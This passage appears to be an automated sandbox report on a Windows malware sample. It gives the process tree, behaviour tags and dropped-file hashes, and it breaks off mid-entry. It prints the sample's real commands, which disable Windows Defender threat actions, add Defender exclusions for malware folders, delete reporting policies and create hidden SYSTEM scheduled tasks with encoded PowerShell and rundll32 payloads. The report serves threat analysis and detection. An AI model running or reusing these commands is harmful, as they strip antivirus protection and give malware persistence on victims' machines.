C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\dKBzwOc.exeC:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\dKBzwOc.exe 3x /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATZmuaBwNwmU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATZmuaBwNwmU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QYiUKrukFVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QYiUKrukFVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SHsJRQZsU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SHsJRQZsU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aJAQLsoDkiWqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aJAQLsoDkiWqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fxkldoUMcXUSOxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fxkldoUMcXUSOxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fxkldoUMcXUSOxVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fxkldoUMcXUSOxVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MYjwJFnMfsmfKHMw /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MYjwJFnMfsmfKHMw /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfhOLlkJz" /SC once /ST 01:47:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfhOLlkJz"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfhOLlkJz"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VgOpnHVQDAdMZqNFB" /SC once /ST 11:10:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\ftDUdwI.exe\" aF /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VgOpnHVQDAdMZqNFB"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\ftDUdwI.exeC:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\ftDUdwI.exe aF /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNHXguvSZYiOwSiXLC"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SHsJRQZsU\uHHMAV.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DNDvMcbpefrYjKZ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DNDvMcbpefrYjKZ2" /F /xml "C:\Program Files (x86)\SHsJRQZsU\ynPViuV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DNDvMcbpefrYjKZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DNDvMcbpefrYjKZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WEhIDiLYPHjasB" /F /xml "C:\Program Files (x86)\ATZmuaBwNwmU2\XrvZFHv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uMLBCyigOFctO2" /F /xml "C:\ProgramData\fxkldoUMcXUSOxVB\qPQykRN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kiDkdQMpQtFhhDeJz2" /F /xml "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\tDqdzXs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VjVOLqrPjSeucnEqiOK2" /F /xml "C:\Program Files (x86)\aJAQLsoDkiWqC\OGLGWjY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mDNVJgqIdbaAfzWWp" /SC once /ST 08:49:21 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\lNkeHXAe\dcCRCuH.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mDNVJgqIdbaAfzWWp"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VgOpnHVQDAdMZqNFB"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\lNkeHXAe\dcCRCuH.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\lNkeHXAe\dcCRCuH.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mDNVJgqIdbaAfzWWp"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\ATZmuaBwNwmU2\XrvZFHv.xmlFilesize
2KB
MD5041768b8442adbafc86aaf0d0a5acf7f
SHA1ff5b1360bdb3b3a4546a82326eb6f46f6d9c12a4
SHA2562424dba27f2a4b5c96909afdf5658b52c75c815536c9a76ca7a156d284b961e7
SHA512115a5e24b4f07cf1d2e1b4716b5bcb0627057d7f1f79ac5e14ab25312291c254f84cf0a5a212e44d499f6d4dbdc0e92d5179c0804e7670cbd12cf535da1cd330
-
C:\Program Files (x86)\SHsJRQZsU\ynPViuV.xmlFilesize
2KB
MD5139c2226d10067e7ecf28ce57c8488e9
SHA10053cd26a39eba2bc42c1859f2be7d8e6a5c1985
SHA256ec4722cf5ba13dcab6ab7bd78dbab384645f393cab18957d45b7dd8a619658f5
SHA512c1575ef6423931b789a287183c0946fad89b4f4e9e4202016e6f4f470963c799e0db29786ad26fc7c4da9c4599b03b68c61f66a9f524618435971f8b1666dd99
-
C:\Program Files (x86)\aJAQLsoDkiWqC\OGLGWjY.xmlFilesize
2KB
MD5aec090833631c2a77e5afe55009777e2
SHA1c8a353fe2c95927469dfaa0bd6b5c2fd9e186b4d
SHA256ee9df192d3c506ddce6ac297bcbc91c0ed3b3b1b409154a027831bb8dc1a22f2
SHA512caa14f222c9cfa58b3a870efe4e5973c3dd62270d5342f49722914abc8f7c0d93919bbf66bc92b618116321486c6fea509192b38aff0a6220a5dfb40db18f818
-
C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\tDqdzXs.xmlFilesize
2KB
MD5750e88bc9dbc50b4e52a8d64a9373012
SHA101d84e00b0047eb494ed41d2c84636cace6ba8cd
SHA256cace8ffc69cc5919a4d4a1dbe680d8021ade99035fb80b0cda315b24a1e2df41
SHA5127729036bc81bdaaab79ecdd49f9559c824f973957c9b0f2a5ff0403f958ccb649d982c6339e644713d60ef9f402896f6011c5c14b2ec2ab1b76d71b1b4771e8e
-
C:\ProgramData\fxkldoUMcXUSOxVB\qPQykRN.xmlFilesize
2KB
MD573431b1ca16d37e6d6f720455278967e
SHA1519ae3c493dd08b99687e2d46b57802ab6a995c0
SHA25677ec744a4373827d959414783bdd01d3bfcdd325075e2e02ff05add459036a30
SHA51246a5c0ba1bab7646835226392f7acd18cf84e7ffc08761820cceddee1d1bd37cf05f1b1e61bc5276d2bbd6bcb32e784e98c0243f8cca74cf5e92e41668298eb6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
C:\Users\Admin\AppData\Local\Temp\7zS60F1.tmp\Install.exeFilesize
